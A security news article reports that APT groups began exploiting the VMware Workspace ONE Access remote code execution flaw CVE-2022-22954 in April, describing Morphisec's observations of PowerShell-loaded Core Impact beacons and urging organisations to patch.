Researchers said that advanced persistent threat (APT) groups started to actively exploit a VMware remote code execution flaw in mid-April, a week after a patch was released for the vulnerability.
The vulnerability (CVE-2022-22954) exists in VMware’s identity management service, Workspace ONE Access (previously known as VMware Identity Manager). The flaw is a server-side template injection bug impacting an Apache Tomcat component that, if exploited, could result in malicious commands being executed on the hosting server. The flaw allows a malicious actor with network access to achieve full remote code execution.
A patch was released for the initial flaw on April 6, and on April 11, a proof-of-concept appeared for the attack. On April 13, the first exploit attempts were observed in the wild.
“Adversaries can use this attack to deploy ransomware or coin miners, as part of their initial access, lateral movement, or privilege escalation,” said researchers in a Monday analysis. “Morphisec research observed attackers already exploiting this vulnerability to launch reverse HTTPS backdoors—mainly Cobalt Strike, Metasploit, or Core Impact beacons.”
In one specific campaign that occurred on April 14 and April 15, Researchers with Morphisec observed attackers leveraging the flaw to execute PowerShell commands as child processes to the legitimate Tomcat prunsrv.exe process application. In the next stage, researchers observed a known malware loader called PowerTrash, which is a highly obfuscated PowerShell script that decompresses the payload and loads it in memory. While PowerTrash has previously been utilized in campaigns to deploy JSSLoader, a .NET RAT that has typically been used by FIN7 in campaigns, in this incident the attackers attempted to load a Core Impact agent, said researchers.
“Core Impact is a penetration testing framework developed by Core Security,” said researchers. “As with other penetration testing frameworks, these aren’t always used with good intentions. TrendMicro reported a modified version of Core Impact was used in the Woolen-GoldFish campaign tied to the Rocket Kitten APT35 group.”
Researchers urged organizations to apply VMware’s patches, and review their VMware architecture to ensure that impacted components are not accidentally published on the internet, which “dramatically increases the exploitation risks.”
“The widespread use of VMWare identity access management combined with the unfettered remote access this attack provides is a recipe for devastating breaches across industries,” said researchers. “Anyone using VMWare’s identity access management should immediately apply the patches VMWare has released.”
VMware products have previously been targeted by attackers, including a remote code execution bug in VMware’s vCenter Server, VMware’s ESXi enterprise-class virtual machine platform and the Log4j flaw in VMware Horizon servers.